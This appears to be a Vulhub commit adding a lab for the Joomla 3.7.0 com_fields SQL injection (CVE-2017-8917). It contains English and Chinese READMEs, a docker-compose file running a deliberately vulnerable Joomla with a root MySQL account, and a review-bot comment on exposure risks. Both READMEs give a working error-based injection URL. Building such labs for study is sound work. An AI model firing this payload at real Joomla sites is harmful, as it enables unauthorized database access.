first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
BIN
joomla/CVE-2017-8917/1.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 82 KiB |
32
joomla/CVE-2017-8917/README.md
Normal file
@@ -0,0 +1,32 @@
# Joomla 3.7.0 com_fields SQL Injection Vulnerability (CVE-2017-8917)
[中文版本(Chinese version)](README.zh-cn.md)
Joomla is a free and open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since become one of the most popular CMS platforms, powering millions of websites around the world.
An SQL injection vulnerability is caused by a new component, com_fields, which was introduced in version 3.7.
References:
- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
## Vulnerable environment
Executing following command to start a Joomla 3.4.5:
```
docker compose up -d
```
After the server is started, you can see the home page of it at `http://your-ip:8080`.
## Exploit
Visit following link directly to reproduce the SQL injection attack:
```
http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
```

26
joomla/CVE-2017-8917/README.zh-cn.md
Normal file
@@ -0,0 +1,26 @@
# Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境
Joomla是一个开源免费的内容管理系统(CMS),基于PHP开发。
Joomla在3.7.0中新引入的一个组件“com_fields”,这个组件任何人都可以访问,无需登陆验证。com_fields组件由于对请求数据过滤不严导致了SQL注入。
参考链接:
- <https://developer.joomla.org/security-centre/692-20170501-core-sql-injection.html>
- <https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html>
## 测试环境
执行如下命令启动一个Joomla 3.7.0服务:
```
docker compose up -d
```
启动后访问`http://your-ip:8080`即可看到Joomla的安装界面和测试数据。
## 漏洞复现
直接访问`http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)`,即可看到SQL报错信息:

18
joomla/CVE-2017-8917/docker-compose.yml
Normal file
@@ -0,0 +1,18 @@
version: '2'
services:
web:
image: vulhub/joomla:3.7.0
depends_on:
- mysql
environment:
- JOOMLA_DB_HOST=mysql
- JOOMLA_DB_PORT=3306
- JOOMLA_DB_USER=root
- JOOMLA_DB_PASSWORD=vulhub
- JOOMLA_DB_NAME=joomla
ports:
- "8080:80"
mysql:
image: mysql:5.7
environment:
- MYSQL_ROOT_PASSWORD=vulhub
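Review bot: the `ports` entry `"8080:80"` on the `web` service publishes a deliberately vulnerable Joomla on every host interface; binding it as `"127.0.0.1:8080:80"`, or stating in the README that the lab belongs on an isolated host, would keep it from being reachable by accident. The `web` service also connects to the database as `root` (`JOOMLA_DB_USER=root`), so any query the application runs has full MySQL privileges; if that is intended for the demonstration, a comment saying so would help. Finally, `depends_on` only orders container start and does not wait for MySQL to accept connections, so the first request after `docker compose up -d` may fail until the database is ready; a healthcheck on `mysql` or a note in the README would cover that.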